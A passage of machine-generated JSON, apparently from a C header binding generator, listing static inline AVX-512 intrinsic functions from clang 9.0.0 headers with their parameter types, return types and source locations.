"/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:992:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1000:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1007:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1015:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1023:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1030:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcast_i32x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1038:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_broadcast_i64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1046:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_broadcast_i64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1053:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcast_i64x2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:1061:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:28:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:44:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:51:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmaintrin.h:59:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:24:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:31:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:39:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_madd52hi_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:62:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:70:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:77:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:85:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:93:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_madd52lo_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512ifmavlintrin.h:108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Z", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:29:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask2_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:38:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:56:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:62:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:71:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:80:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:86:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmiintrin.h:95:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:23:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:31:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask2_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:40:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:58:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:65:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask2_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:74:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutex2var_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:83:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:92:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:98:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:106:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:121:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutexvar_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:162:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_multishift_epi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:177:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_compress_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_compress_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_compress_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:38:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_compress_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_compressstoreu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_compressstoreu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_expand_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": 